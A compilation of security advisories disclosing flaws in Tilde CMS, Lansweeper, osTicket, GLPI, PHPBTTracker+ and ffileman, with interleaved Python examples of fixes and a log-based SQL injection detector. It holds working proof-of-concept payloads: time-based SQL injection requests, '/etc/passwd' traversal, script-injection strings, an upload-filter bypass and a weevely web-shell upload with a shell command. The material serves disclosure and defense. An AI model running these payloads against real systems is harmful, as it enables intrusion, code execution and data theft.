Tilde CMS v1.01, Multiple Vulnerabilities

# Authors: Paolo Forte, Raffaele Forte
# Vendor Homepage: http://www.tildenetwork.com
# Version: Tilde CMS v1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10

I. INTRODUCTION
Tilde CMS is a closed-source content management system created by tildenetwork.com.

II. DESCRIPTION
The web application suffers from multiple vulnerabilities.

1. SQL Injection (CVE-2017-11324)

Due to missing escaping of the backtick character, the following query in the source code is vulnerable:

[class.SystemAction.php]

$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);

The vulnerability can be triggered via a POST request as shown in the following PoC:

POST /actionphp/action.input.php HTTP/1.1
ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE SLEEP(5)-- aaa &idForm=1234567890

The resulting query on the server-side will be:

SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'

For a successful exploitation, the table “form_table_1” must be valid.
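The fix for this class of bug is not to escape the backtick but to keep attacker input out of the identifier position entirely. The following Python example, added here and not part of Tilde CMS, shows one way to do that: the form id that becomes the table-name suffix is validated against a digits-only allowlist, while the row id is bound as a query parameter so its quoting never matters. An in-memory SQLite table stands in for the MySQL `form_table_<id>` tables; the table and its row are constructed for the example.

```python
import re
import sqlite3

# Only a plain decimal id may become part of the table name.
FORM_ID_RE = re.compile(r"^[0-9]{1,10}$")


def build_form_query(id_form, id_row):
    """Return (sql, params) for the lookup shown in the advisory.

    A table name cannot be bound as a query parameter, so the form id is
    validated against a strict allowlist instead of being escaped; the
    backtick trick from the PoC never reaches the query string.  The row id
    goes in as a bound parameter, so its quoting is irrelevant.
    """
    if not isinstance(id_form, str) or not FORM_ID_RE.match(id_form):
        raise ValueError("invalid form id")
    sql = "SELECT * FROM `form_table_%s` WHERE ID = ?" % id_form
    return sql, (id_row,)


def make_demo_db():
    """Constructed stand-in for the MySQL form tables (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE form_table_1 (ID TEXT, payload TEXT)")
    conn.execute("INSERT INTO form_table_1 VALUES ('1234567890', 'hello')")
    return conn


def fetch_form_row(conn, id_form, id_row):
    """Look up one submission; raises ValueError for a tampered form id."""
    sql, params = build_form_query(id_form, id_row)
    return conn.execute(sql, params).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    print(fetch_form_row(db, "1", "1234567890"))
    try:
        fetch_form_row(db, "1` WHERE SLEEP(5)-- aaa ", "1234567890")
    except ValueError as exc:
        print("rejected:", exc)
```

The same split applies to any identifier built from request data: column names, ORDER BY targets and table suffixes are allowlisted, everything else is bound.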

2. Path Traversal (CVE-2017-11325)

The vulnerability is reachable through the following request:

GET /actionphp/download.File.php?&file=../../../../../../etc/passwd

3. Arbitrary Files Upload (CVE-2017-11326)

It is possible to bypass the implemented restrictions shown in the following snippet of the code:

$file=$_FILES['file'.$i]['tmp_name'];
if (($file!="")&&($file!="none")) {
    $source_file=$file;
    $file_name=$_FILES['file'.$i]['name'];
    $file_name=str_replace(".php",".txt",$file_name);
    $file_name=str_replace(" ","_",$file_name);
    $file_name=str_replace("+","",$file_name);

A file named “filename.+php” is renamed to “filename.php”, because the “.php” replacement runs before the “+” is stripped, and is therefore successfully uploaded.

4. Insecure Direct Object References (CVE-2017-11327)

It is possible to retrieve sensitive resources by using direct references.
A low-privileged user can load PHP resources such as:

    admin/content.php
    admin/content.php?method=ftp_upload

IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.

V. SYSTEMS AFFECTED
Tilde CMS v1.01 is vulnerable (probably all previous versions too).

VI. VULNERABILITY HISTORY
July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: CVE-ID reserved

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

Lansweeper v6.0.0.63, XSS Vulnerability

# Discovered by: Giovanni Cerrato, Giovanni Guido (BackBox Team)
# Vendor Homepage: https://www.lansweeper.com/
# Version: Lansweeper 6.0.0.63

I. INTRODUCTION

Lansweeper, an asset management and network inventory tool (v6.0.0.63 and probably all previous versions), is affected by an XSS vulnerability.

II. DESCRIPTION

The application is affected by Cross Site Scripting vulnerabilities.

An attacker can use this vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim’s session token or login credentials, performing arbitrary actions on the victim’s behalf, and logging their keystrokes. Reference: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

The vulnerable function does not appear to require authentication.

  • URL: hostname/GlobalActions.aspx?action=getthumbnail
  • Vulnerable parameters: username, userdomain, upn
  • Method: POST

III. PROOF OF CONCEPT

The vulnerability can be triggered via a POST request as shown in the following PoCs.

Payload username parameter:

POST /GlobalActions.aspx?action=getthumbnail HTTP/1.1
type=1&id=-2&size=75&username=<script>alert(1)</script>&userdomain=&upn=

Payload userdomain parameter:

POST /GlobalActions.aspx?action=getthumbnail HTTP/1.1
type=1&id=-2&size=75&username=test&userdomain=<script>alert(1)</script>&upn=

Payload upn parameter:

POST /GlobalActions.aspx?action=getthumbnail HTTP/1.1
type=1&id=-2&size=75&username=test&userdomain=&upn=<script>alert(1)</script>

IV. BUSINESS IMPACT

An attacker could perform a wide variety of actions such as stealing the victim’s session token or login credentials, performing arbitrary actions on the victim’s behalf, and logging their keystrokes.

V. SYSTEMS AFFECTED

Version 6.0.0.63 is vulnerable (probably all previous versions).

VI. REFERENCES

https://www.lansweeper.com/changelog.aspx BUG: #542782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9292

VII. CREDITS

The vulnerability has been discovered by the BackBox Team:

Giovanni Cerrato, giovanni(dot)cerrato(at)aizoon(dot)it
Giovanni Guido, giovanni(dot)guido(at)aizoon(dot)it

VIII. ADVISORY TIMELINE

April 21st, 2017: Vulnerability identification
April 21st, 2017: First contact with vendor
April 26th, 2017: Vendor notified
April 26th, 2017: Vendor response; investigating
May 2nd, 2017: Vendor says that the vulnerability will be fixed in the new version
May 11th, 2017: Vulnerability fixed (Bug 542782)
May 23rd, 2017: CVE requested
May 29th, 2017: CVE received – “CVE-2017-9292”

IX. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

osTicket v1.9.12, Multiple Vulnerabilities

# Authors: Giovanni Cerrato, Enrico Cinquini
# Vendor Homepage: http://osticket.com/
# Version: osTicket v.1.9.12

I. INTRODUCTION

The latest version of osTicket (v1.9.12) is affected by multiple vulnerabilities.

II. DESCRIPTION

The web application suffers from multiple vulnerabilities.

1. Upload HTML file

Files can be attached to a ticket at the following URL:
https://hostname/upload/open.php

There are some controls to block disallowed files (e.g. php, html), but they are only client-side, not server-side, so they can easily be bypassed using a tool like Burp Suite. The files are uploaded and reachable at a specific URL like the following example:
https://hostname/file.php?key=qycj1msethqx49ilidrwxrurvebbsipa&expires=1447372800&signature=6ee71ea7dee17cac30a884f4cf823c6734e1115d

This vulnerability could be used, for example, to perform an XSS attack or to upload a fake login page.

2. Missing function level access control

It is possible to access some contents of the web application without authentication. Any ticket attachment can be viewed simply by calling its URL, like the following:
https://hostname/file.php?key=qycj1msethqx49ilidrwxrurvebbsipa&expires=1447372800&signature=6ee71ea7dee17cac30a884f4cf823c6734e1115d

This vulnerability, combined with the unrestricted HTML upload, can be used to carry out phishing and/or XSS attacks via email. To achieve this, one only needs to upload an HTML file containing malicious JavaScript or a phishing page and then spread the associated URL.

3. Stored Cross Site Scripting

The application is vulnerable to several stored XSS attacks.

URL: https://hostname/scp/users.php
Functionality: Add User
Form parameter affected: Internal Notes

URL: https://hostname/scp/orgs.php
Functionality: Add Organization
Form parameter affected: Name, Internal Notes

URL: https://hostname/scp/categories.php
Functionality: Add New Category
Form parameter affected: Category Description, Internal Notes

URL: https://hostname/scp/departments.php
Functionality: Add New Department
Form parameter affected: Department Signature

URL: https://hostname/scp/teams.php
Functionality: Add New Team
Form parameter affected: Admin Notes, Name

URL: https://hostname/scp/groups.php
Functionality: Add New Group
Form parameter affected: Admin Notes

URL: https://hostname/scp/banlist.php
Functionality: Ban New Email
Form parameter affected: Admin Notes

URL: https://hostname/scp/profile.php
Functionality: Edit profile
Form parameter affected: Signature

A proof of concept can be obtained using the following payload:
<IFRAME onload=alert(1);></IFRAME>

4. Session fixation

The application does not regenerate the session ID cookie (OSTSESESSID) after authentication, so it is prone to session fixation attacks. This vulnerability can be used to hijack a valid user session.
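What a fixation-resistant login looks like, as an added Python illustration (not osTicket code): the session ID the browser presented before authentication is discarded and a freshly generated one is bound to the logged-in user. `login_no_rotate` shows the vulnerable pattern for comparison. The in-memory store is a stand-in for the server's real session storage.

```python
import secrets


class SessionStore:
    """In-memory stand-in for server-side session storage."""

    def __init__(self):
        self._sessions = {}   # session id -> session data

    def start(self):
        """Issue an anonymous session, as happens on the first visit."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        """Who a presented session id is logged in as (None if nobody)."""
        data = self._sessions.get(sid)
        return None if data is None else data["user"]

    def login(self, presented_sid, user):
        """Authenticate and rotate the session id (the fix).

        Whatever id the browser presented, possibly one planted by an
        attacker, is retired; only a freshly generated id carries the login.
        """
        data = self._sessions.pop(presented_sid, None) or {}
        data["user"] = user
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = data
        return new_sid

    def login_no_rotate(self, presented_sid, user):
        """The vulnerable pattern: the pre-login id keeps working afterwards,
        so anyone who knew it beforehand now owns the authenticated session."""
        if presented_sid not in self._sessions:
            return None
        self._sessions[presented_sid]["user"] = user
        return presented_sid


if __name__ == "__main__":
    store = SessionStore()
    planted = store.start()
    fresh = store.login(planted, "alice")
    print("old id still valid after login:", store.user_for(planted) is not None)
    print("new id carries the login:", store.user_for(fresh))
```

In PHP the same rotation is a single call to `session_regenerate_id(true)` immediately after the credentials check, which also deletes the old session file; the point of the example is where that call belongs, before any authenticated state is written.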

III. BUSINESS IMPACT

An attacker could upload malicious files, hijack a valid user session, perform XSS or phishing attacks and access sensitive information.

IV. SYSTEMS AFFECTED

Version 1.9.12 is vulnerable.

V. SOLUTION

It is necessary to:

  • implement a strong upload filter to prevent the upload of malicious files
  • implement an input validation mechanism to avoid being vulnerable to XSS injection
  • review and correct the access control so that unauthenticated users cannot access sensitive documents

VI. ADVISORY TIMELINE

November 10th, 2015: Vulnerability identification
November 17th, 2015: First contact with vendor
November 19th, 2015: Vendor notified
November 25th, 2015: Asking for status update
November 30th, 2015: Vendor response; investigating
December 16th, 2015: Asking for status update
December 18th, 2015: Vendor says that the vulnerabilities will be fixed in the new version
January 11th, 2016: Provided more details to vendor
January 25th, 2016: Asking for status update
February 2nd, 2016: Advised vendor that the public disclosure date will be February 4th
February 2nd, 2016: Vendor provides status update (still investigating)
February 4th, 2016: Public disclosure

VII. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

GLPI v0.85.5, RCE through file upload filter bypass

# Author: Raffaele Forte
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI v0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3

I. INTRODUCTION

GLPI is the Information Resource-Manager with an additional Administration-Interface. You can use it to build up a database with an inventory for your company (computers, software, printers…). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking system with mail notification and methods to build a database with basic information about your network topology.

II. DESCRIPTION

The application allows users to update their own profile; among other things, the user can add a new photo as an attachment.

The uploaded photo is stored in “GLPI_ROOT/files/_pictures/”.

This file, for example named “photo.jpeg”, will be directly accessible at “http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg”, where “XXXX” is an ID automatically generated by the system and visible in the HTML source code.

Moreover, the server does not check the extension of the uploaded file, only its first bytes (the magic number), which indicate what kind of file it is.

Exploiting this flaw, an attacker may upload a tampered JPEG file with PHP code appended at its end: simply changing the file extension to “.php” is enough for the PHP code to be interpreted by default.

To trigger this vulnerability it is necessary to have an account.

This vulnerability is a combination of two issues:

  • predictable name and path of the uploaded file
  • upload of any kind of file, not limited to images
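Both this GLPI upload and the Tilde CMS upload filter above (section 3 of the first advisory) fail for the same reason: the check is run on the wrong thing, a blacklisted substring before normalisation in one case, magic bytes without the extension in the other. The Python example below, added here and not taken from either project, shows an upload name policy that normalises first, then requires the final extension to be on an allowlist, requires the magic bytes to agree with that extension, and stores the file under a server-generated random name so the stored path is not predictable. `tilde_rename` reproduces the quoted Tilde CMS replacement order only to show the bypass; `ALLOWED` and the sample byte strings are constructed for the example.

```python
import os
import secrets

# Allowed extensions and the magic bytes each must start with (constructed
# allowlist for the example; extend as needed).
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def tilde_rename(file_name):
    """Reproduces the replacement order quoted from Tilde CMS (vulnerable):
    '.php' is blacklisted before '+' is removed, so 'x.+php' ends as 'x.php'."""
    file_name = file_name.replace(".php", ".txt")
    file_name = file_name.replace(" ", "_")
    file_name = file_name.replace("+", "")
    return file_name


def safe_store_name(file_name, head):
    """Return a server-chosen name for the upload, or None to reject it.

    head is the first bytes of the uploaded content.  The policy:
      1. normalise first (strip directories, spaces, '+'), then judge the
         final name, so 'filename.+php' is seen as 'filename.php';
      2. the final extension must be on the allowlist (no '.php' blacklist);
      3. the magic bytes must match that extension, so a script under a
         JPEG name, or a JPEG header under a '.php' name, is refused;
      4. the stored name is random, so its path cannot be predicted.
    """
    base = os.path.basename(file_name).replace(" ", "_").replace("+", "")
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not head.startswith(magic):
        return None
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    jpeg_head = b"\xff\xd8\xff\xe0" + b"\x00" * 12   # constructed JPEG prefix
    print("Tilde rename of filename.+php ->", tilde_rename("filename.+php"))
    print("policy on filename.+php       ->", safe_store_name("filename.+php", jpeg_head))
    print("policy on photo.php (JPEG)    ->", safe_store_name("photo.php", jpeg_head))
    print("policy on photo.jpeg (JPEG)   ->", safe_store_name("photo.jpeg", jpeg_head))
```

A magic-number check cannot detect PHP appended to a genuine JPEG, which is exactly the GLPI trick; the extension allowlist and the random server-chosen name are what stop the file from being served as a script, and the upload directory should additionally be configured so the web server never executes anything stored in it.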

III. PROOF OF CONCEPT

Generate backdoor:

user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg 
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php

Upload the new tampered photo in GLPI > Settings

Open a terminal to the target:

user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123

IV. BUSINESS IMPACT

By uploading an interpretable PHP file, an attacker may be able to execute arbitrary code on the server.

This flaw may compromise the integrity of the system and/or expose sensitive information.

V. SYSTEMS AFFECTED

GLPI Version 0.85.5 is vulnerable (probably all previous versions too).

VI. VULNERABILITY HISTORY

September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification

VII. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

PHPBTTracker+ v2.2, SQL Injection

# Exploit Author: BackBox Team
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/
# Version: PHPBTTracker+ v2.2
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0

I. INTRODUCTION

SQL Injection through User-Agent.

The User-Agent is an HTTP request header that identifies the application used by the original client. It is used for statistical purposes and for tracing protocol violations. Its first whitespace-delimited word must include the product name, with an optional slash and version number.

Injection through the User-Agent header is a critical issue for web applications. In this specific case it is worth investigating the User-Agent header to see whether a malformed value allows SQL injection.

Example:

GET /tracker.php
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa
Host: [host]
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity

II. BACKGROUND

BitTorrent tracker protocol is used by clients to request the IP addresses of other peers associated with a torrent, and to exchange the client’s transfer statistics. Clients connect to a centralized server, known as a *tracker*, which stores their IP addresses and responds with the IP addresses of other clients (also known as *peers*). The tracker has no knowledge about the association of the nodes and their pieces (it functions only as bridge between clients).

The standard tracker protocol is based on HTTP, with request data encoded as query parameters (as used by HTML forms) and response data BEncoded.

Query parameters must be encoded according to the rules for HTML form submissions through HTTP GET: ‘reserved character’ bytes are encoded in hexadecimal as %HH, and space is encoded as “+”; names and values are joined with “=” and the pairs joined with “&”.

The tracker’s announce URL is obtained from the announce entry of the root dictionary of the torrent metadata file.

Clients announce themselves by sending a GET request to the tracker’s announce URL with “?” and the following parameters (encoded as above) appended:

info_hash
The 20 byte sha1 hash of the bencoded form of the info value from the metainfo file. Note that this is a substring of the metainfo file. Don’t forget to URL-encode this.

peer_id
A string of length 20 which the downloader uses as its id. Each downloader generates its own id at random at the start of a new download. Don’t forget to URL-encode this.

port
Port number that the peer is listening on. Common behavior is for a downloader to try to listen on port 6881 and if that port is taken try 6882, then 6883, etc. and give up after 6889.

uploaded
Total amount uploaded so far, represented in base ten in ASCII.

downloaded
Total amount downloaded so far, represented in base ten in ASCII.

left
Number of bytes that a specific client still has to download, represented in base ten in ASCII. Note that this can’t be computed from downloaded and the file length since the client might be resuming an earlier download, and there is a chance that some of the downloaded data failed an integrity check and had to be re-downloaded.

event
Optional key which maps to started, completed, or stopped (or empty, which is the same as not being present). If not present, this is one of the announcements done at regular intervals. An announcement using started is sent when a download first begins, and one using completed is sent when the download is complete. No completed is sent if the file was complete when started. Downloaders should send an announcement using ‘stopped’ when they cease downloading, if they can.

Example:

http://hostname/announce
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4
&peer_id=
&port=51413
&uploaded=0
&downloaded=0
&left=0
&event=started
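As an added example (not from the PHPBTTracker+ code base), the Python below builds the announce request described above and parses one back, keeping `info_hash` and `peer_id` as raw bytes rather than text; `announce_problems` checks the field constraints listed above (20-byte hash and peer id, base-ten counters, the three event values). `PAGE_EXAMPLE` is the example request from this section joined onto one line; the peer id and announce host used when building a request are constructed values.

```python
from urllib.parse import quote, unquote_to_bytes, urlsplit

# The example announce request from this section, joined onto one line.
PAGE_EXAMPLE = (
    "http://hostname/announce"
    "?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4"
    "&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started"
)

EVENTS = (b"", b"started", b"completed", b"stopped")


def build_announce_url(announce, info_hash, peer_id, port,
                       uploaded=0, downloaded=0, left=0, event=None):
    """Build a client announce request; binary fields are percent-encoded."""
    if len(info_hash) != 20 or len(peer_id) != 20:
        raise ValueError("info_hash and peer_id must be exactly 20 bytes")
    params = [("info_hash", info_hash), ("peer_id", peer_id),
              ("port", str(port)), ("uploaded", str(uploaded)),
              ("downloaded", str(downloaded)), ("left", str(left))]
    if event:
        params.append(("event", event))
    # quote() encodes every byte outside the unreserved set as %HH,
    # which is what the tracker protocol requires for the raw hash bytes.
    query = "&".join(k + "=" + quote(v, safe="") for k, v in params)
    return announce + "?" + query


def parse_announce(url):
    """Split the query into raw byte values (info_hash is binary, not text)."""
    fields = {}
    for pair in urlsplit(url).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[key] = unquote_to_bytes(value)
    return fields


def announce_problems(fields):
    """List the constraints from the protocol description that a request breaks."""
    problems = []
    for name in ("info_hash", "peer_id"):
        if len(fields.get(name, b"")) != 20:
            problems.append(name + " is not 20 bytes")
    for name in ("port", "uploaded", "downloaded", "left"):
        if not fields.get(name, b"").isdigit():
            problems.append(name + " is not a base-ten integer")
    if fields.get("event", b"") not in EVENTS:
        problems.append("event is not one of started/completed/stopped")
    return problems


if __name__ == "__main__":
    fields = parse_announce(PAGE_EXAMPLE)
    print("info_hash bytes:", fields["info_hash"].hex())
    print("problems with the page example:", announce_problems(fields))
```

Running it on the page's own request reports only that `peer_id` is empty, which is how the capture in the next section was made.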

III. DESCRIPTION

In order to exploit the vulnerability, the torrent has to be managed by the tracker. First we need to capture the GET request and parse out the “info_hash” parameter; a proxy or a traffic sniffer like Wireshark can help with that.

Example:

GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1
User-Agent: Transmission/2.51
Host: hostname
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity

Then it’s possible to inject SQL commands inside the User-Agent field.

IV. PROOF OF CONCEPT

It is possible to verify the vulnerability by using, for example, sqlmap or curl.

* Using SQLMap

raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent

User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:

Place: User-Agent
Parameter: User-Agent
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW

* Using curl

raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'
[...]
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e
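From the defender's side, the same header can be watched for. The following Python snippet, added here, parses Apache combined-format access log lines and flags User-Agent values that carry a quote followed by a SQL keyword or a timing function call, which is the shape of the payloads in this section. The log lines in `SAMPLE_LOG` are constructed for the example (two benign tracker clients and two lines carrying the advisory's payloads); the regular expressions are a starting heuristic, not a complete signature.

```python
import re

# Constructed Apache combined-format log lines (not from the page's system);
# the last two carry the User-Agent payloads shown in this section.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [13/May/2014:10:01:02 +0200] "GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=abc&port=51413 HTTP/1.1" 200 312 "-" "Transmission/2.51"',
    '10.0.0.7 - - [13/May/2014:10:01:05 +0200] "GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=abc&port=6881 HTTP/1.1" 200 298 "-" "uTorrent/3.3.0"',
    '10.0.0.9 - - [13/May/2014:10:02:41 +0200] "GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=abc&port=51413 HTTP/1.1" 200 312 "-" "Transmission/2.51\' OR (SLEEP(20)) AND \'aaaa\'=\'aaaa"',
    '10.0.0.9 - - [13/May/2014:10:03:10 +0200] "GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=abc&port=51413 HTTP/1.1" 200 312 "-" "asd\\" OR (SLEEP(15)) AND \\""',
])

# Combined log format; Apache writes a literal double quote inside the
# User-Agent as \" so the last group allows escaped characters.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

SQLI_UA = re.compile(
    r"""['"]\s*\)*\s*(?:OR|AND|UNION|SELECT|RLIKE|HAVING|WHERE)\b"""   # quote breakout + keyword
    r"""|\b(?:SLEEP|BENCHMARK)\s*\("""                                  # timing functions
    r"""|--\s|/\*""",                                                    # comment terminators
    re.IGNORECASE,
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    match = LINE_RE.match(line)
    return None if match is None else match.groupdict()


def suspicious_user_agents(log_text):
    """Return (client ip, user agent) for every line whose UA looks like SQL."""
    hits = []
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        ua = record["ua"].replace('\\"', '"')   # undo Apache's quote escaping
        if SQLI_UA.search(ua):
            hits.append((record["ip"], ua))
    return hits


if __name__ == "__main__":
    for ip, ua in suspicious_user_agents(SAMPLE_LOG):
        print(ip, "->", ua)
```

The heuristic keys on a quote character immediately followed by a keyword so that ordinary apostrophes in product names do not fire; tune the keyword list against your own traffic before alerting on it, and pair it with the real fix on the application side, which is binding the User-Agent value as a parameter rather than concatenating it into the INSERT.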

V. BUSINESS IMPACT

An attacker could execute arbitrary SQL queries on the vulnerable system. This may compromise the integrity of the database and/or expose sensitive information.

VI. SYSTEMS AFFECTED

PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and RivetTracker v1.x too).

VII. REFERENCES

  • http://resources.infosecinstitute.com/sql-injection-http-headers
  • https://wiki.theory.org/BitTorrent_Tracker_Protocol

VIII. CREDITS

The vulnerability has been discovered by the BackBox Linux Team.

IX. VULNERABILITY HISTORY

May 13th, 2014: Vulnerability identification
May ??th, 2014: Vendor notification
May ??th, 2014: Vulnerability disclosure

X. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

ffileman v7.0, Directory Traversal Vulnerability

# Author: Raffaele Forte
# Vendor Homepage: https://f-fileman.sourceforge.io/
# Version: ffileman v7.0
# Tested on: Linux

I. DESCRIPTION

A directory traversal vulnerability has been found in ffileman 7.0, a web-based file and directory manager written in Perl.

The vulnerability can be exploited to access local files by entering special characters in the variables used to build file paths. An attacker uses “../” sequences to move up to the root directory, which then permits navigation through the whole file system.

The issue can only be exploited with an authenticated session, by setting the “direkt” variable as shown below in an HTTP GET or POST request.

Request:

GET http://[webserver IP]/cgi-bin/ffileman.cgi?direkt=../../../../../../../../&kullanici=[username]&sifre=[password]&dizin_git=Vai%20alla%20Directory HTTP/1.1
Host: [webserver IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://[webserver IP]/cgi-bin/ffileman.cgi?direkt=[original path]&kullanici=[username]&sifre=[password]&dizin_git=Vai%20alla%20Directory
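The check that both this ffileman handler and the Tilde CMS `download.File.php` endpoint above (section 2 of the first advisory) lack is a containment test on the resolved path. The Python example below, added here and not from either project, treats the user-supplied value as relative to a fixed base directory, collapses the `..` segments, and refuses anything that no longer lies under that base; `BASE_DIR` is a hypothetical root chosen for the example.

```python
import posixpath

BASE_DIR = "/var/www/app/uploads"   # hypothetical root the handler may serve from


def resolve_under_base(base, user_path):
    """Return the absolute path for user_path if it stays under base, else None.

    The user value is treated as relative (a leading '/' is stripped so an
    absolute input cannot escape either), normalised so '..' segments are
    collapsed, and then compared against the base directory.  A NUL byte is
    rejected outright because C-level file APIs would truncate the path there.
    """
    if "\x00" in user_path:
        return None
    rel = user_path.lstrip("/")
    target = posixpath.normpath(posixpath.join(base, rel))
    base_n = posixpath.normpath(base)
    # "startswith(base + '/')" rather than "startswith(base)" so that a
    # sibling such as /var/www/app/uploads2 is not accepted by accident.
    if target != base_n and not target.startswith(base_n + "/"):
        return None
    return target


if __name__ == "__main__":
    for value in ("reports/2017.pdf",
                  "../../../../../../etc/passwd",        # Tilde CMS PoC value
                  "../../../../../../../../",            # ffileman PoC value
                  "/etc/passwd"):
        print("%-32r -> %r" % (value, resolve_under_base(BASE_DIR, value)))
```

In a real handler, call `os.path.realpath` on the result as well, so that symbolic links inside the base cannot lead outside it; `posixpath.normpath` is used here so the example runs without touching the file system.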

VI. VULNERABILITY HISTORY
July 17th, 2009: Fixed with version 8.0

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.